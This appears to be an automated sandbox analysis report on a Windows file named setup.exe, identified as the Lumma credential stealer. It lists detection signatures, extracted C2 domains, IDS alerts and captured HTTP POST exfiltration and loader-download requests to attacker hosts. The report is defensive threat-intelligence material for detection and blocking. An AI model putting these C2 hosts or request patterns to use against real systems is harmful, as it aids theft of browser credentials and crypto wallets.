Windows Analysis Report
setup.exe

Overview

General Information

Sample name: setup.exe
Analysis ID: 1579284
MD5: 8833d5dde7a59afee96f52ae93cb069c
SHA1: b818a52f023050158c754706917c3f9e5056627b
SHA256: d20f4f1050be4fb925d846b21e6ad512af6d6fdb6c7bf1b89111e74c534358d0
Tags: exeuser-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sigma detected: Invoke-Obfuscation Via Stdin
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Found malware configuration
Source: setup.exe.3844.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["principledjs.click", "rapeflowwj.lat", "necklacebudi.lat", "energyaffai.lat", "crosshuaht.lat", "sustainskelet.lat", "aspecteirs.lat", "discokeyus.lat", "grannyejh.lat"], "Build id": "hRjzG3--ALFA"}
Multi AV Scanner detection for submitted file
Source: setup.exe ReversingLabs: Detection: 15%
Source: setup.exe Virustotal: Detection: 19% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 92.9% probability
Uses 32bit PE files
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.191.144:443 -> 192.168.2.4:49744 version: TLS 1.2
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov byte ptr [edx], cl 0_2_010FC117
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edx, byte ptr [ebp+ecx+6DBD87A7h] 0_2_010F614C
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov edi, 00000001h 0_2_010F614C
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h 0_2_0111E146
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx esi, byte ptr [ebp+edx-00000090h] 0_2_010FE014
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov word ptr [ebp+00h], cx 0_2_01109036
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov ecx, eax 0_2_010F607C
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx ebx, byte ptr [esp+esi] 0_2_01104096
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then test eax, eax 0_2_01118366
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+6DBD87B7h] 0_2_01118366
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h] 0_2_0110E3D4
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov word ptr [eax], cx 0_2_011033C6
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-02262853h] 0_2_0111E296
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov word ptr [eax], cx 0_2_010F55A8
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h 0_2_010F55A8
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-02262853h] 0_2_0111E5B6
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov byte ptr [esi], al 0_2_010FC42F
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov byte ptr [edi], al 0_2_0110C70A
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov edx, ecx 0_2_0110A734
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov byte ptr [edi], al 0_2_0110C77A
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov esi, dword ptr [esp+38h] 0_2_011097B2
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov byte ptr [edi], al 0_2_0110C7C3
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], E5FE86B7h 0_2_0110363B
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax] 0_2_0111A676
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_0110D69B
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-02262853h] 0_2_0111E916
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 0_2_01114906
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then jmp edx 0_2_01103966
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov edi, dword ptr [esp+2Ch] 0_2_01105996
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h 0_2_010F8807
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov word ptr [eax], cx 0_2_010FA823
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx eax, byte ptr [ecx+esi] 0_2_010E9846
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Bh] 0_2_010EA866
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov byte ptr [eax], cl 0_2_010EA866
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov byte ptr [edi], al 0_2_010F7A99
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov byte ptr [edx], cl 0_2_010EAB16
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov ecx, eax 0_2_010EEBDD
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh 0_2_010EFA07
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh 0_2_010EFA07
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then jmp eax 0_2_010F8A74
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov byte ptr [edi], al 0_2_010F7AA6
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov ecx, eax 0_2_010EEAB0
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 0_2_0110ADA6
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov word ptr [eax], cx 0_2_01102C06
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+28h] 0_2_010E8C16
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 0_2_010E8C16
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0BB14481h] 0_2_0111BF08
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov dword ptr [esi+04h], eax 0_2_0110DF0E
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh 0_2_01105FAF
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov ecx, eax 0_2_01104E16
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then lea edx, dword ptr [eax-30h] 0_2_0110CE07
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then mov edx, dword ptr [esi+1Ch] 0_2_0110CE07
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h] 0_2_0110DE27
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h] 0_2_0110DE76
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then jmp eax 0_2_01107E62
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h] 0_2_0110DE64
Source: C:\Users\user\Desktop\setup.exe Code function: 4x nop then movzx edx, byte ptr [ebx+ecx+3DAAA828h] 0_2_010ECECB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 172.67.187.214:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: principledjs.click
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.191.144:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.187.214:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.187.214:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: principledjs.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: principledjs.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1K043PIXULYUMNAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18144Host: principledjs.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4BY035FF3JGGE6GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8765Host: principledjs.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IX4OXCEDTRVKS77UV5HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: principledjs.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DDA65D94E3A9UUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1232Host: principledjs.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=APIFT1CLQYI8DHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1092Host: principledjs.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: principledjs.click
Source: global traffic HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
Source: global traffic DNS traffic detected: DNS query: principledjs.click
Source: global traffic DNS traffic detected: DNS query: kliptizq.shop
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: principledjs.click
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 21 Dec 2024 11:58:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ptjd%2F%2BjwNzE3PFFjsHqD52Kvujj9piy6jwF3a5bNo1WzE2Pd3Olr5GHju6jB242ov4kYnNXLYtebmwi8YUMHQqiNgUHjr01N9Ts79wWE9YGliZiiub9c2Oj2zSqXBHwC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f57b3ae1fec0fa0-EWR
Source: setup.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: setup.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: setup.exe String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: setup.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: setup.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: setup.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: setup.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: setup.exe String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: setup.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: setup.exe String found in binary or memory: http://ocsp.digicert.com0N
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: setup.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000004.00000002.2037317658.0000000004581000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: setup.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: setup.exe String found in binary or memory: http://www.winxdvd.com
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htm?dcp_beginbeuiafterafuiopenUsing_Trial_CopyThis
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htm?dcpregisteropenRegistered_SuccessfullyRegistered
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htmlatest_unreg_addBuy
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htmold_unreg_addBuy
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/download.htm7http://www.winxdvd.com/help/how-to-use-dvd-copy-pro
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/faq.htm1http://www.winxdvd.com/dvd-copy-pro/updatelog.htm9http:/
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/free-update.htm
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/free-update.htm?chlic13open
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htm
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htmThe
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htmlatest_reg_addEnjoy
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htmold_reg_addUpdate
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/upgradeini/upgrade.ini
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/upgradeini/upgrade.iniupgrade.iniD=
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/specialoffer/latest_giveaway_addBuy
Source: setup.exe String found in binary or memory: http://www.winxdvd.com/specialoffer/old_giveaway_addBuy
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: setup.exe, 00000000.00000003.1919054319.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: setup.exe, 00000000.00000003.1872572516.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1872838926.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1873160478.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000004.00000002.2037317658.0000000004581000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: setup.exe, 00000000.00000003.1872572516.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1872838926.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1873160478.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: setup.exe, 00000000.00000003.1872572516.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1872838926.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1873160478.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: setup.exe, 00000000.00000003.1872572516.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1872838926.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1873160478.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: setup.exe, 00000000.00000003.1872572516.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1872838926.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: setup.exe, 00000000.00000003.1872572516.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1872838926.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: setup.exe, 00000000.00000003.1872572516.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1872838926.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: setup.exe, setup.exe, 00000000.00000003.2027342879.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2031556050.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/
Source: setup.exe, 00000000.00000003.2027342879.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2031556050.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/(O
Source: setup.exe, setup.exe, 00000000.00000003.2027342879.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2028307688.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2031556050.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
Source: setup.exe, 00000000.00000003.2027342879.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2031556050.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtG21O
Source: setup.exe, 00000000.00000003.2027342879.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2031556050.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtR3#O
Source: setup.exe, 00000000.00000002.2028307688.0000000000F92000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtg
Source: setup.exe, 00000000.00000002.2028307688.0000000000F60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop:443/int_clp_ldr_sha.txt
Source: setup.exe, 00000000.00000002.2028307688.0000000000F1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://principledjs.click/
Source: setup.exe, 00000000.00000003.1942743913.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1917292812.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1918688242.0000000003F83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://principledjs.click/api
Source: setup.exe, 00000000.00000002.2028307688.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://principledjs.click/apird
Source: setup.exe, 00000000.00000003.1917292812.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1918688242.0000000003F83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://principledjs.click/apiz
Source: setup.exe, 00000000.00000002.2028307688.0000000000F60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://principledjs.click:443/api
Source: setup.exe, 00000000.00000002.2028307688.0000000000F60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://principledjs.click:443/api.default-release/key4.dbPK
Source: setup.exe, 00000000.00000002.2028307688.0000000000F60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://principledjs.click:443/api=T
Source: setup.exe, 00000000.00000002.2028307688.0000000000F60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://principledjs.click:443/apiTU
Source: setup.exe String found in binary or memory: https://sectigo.com/CPS0
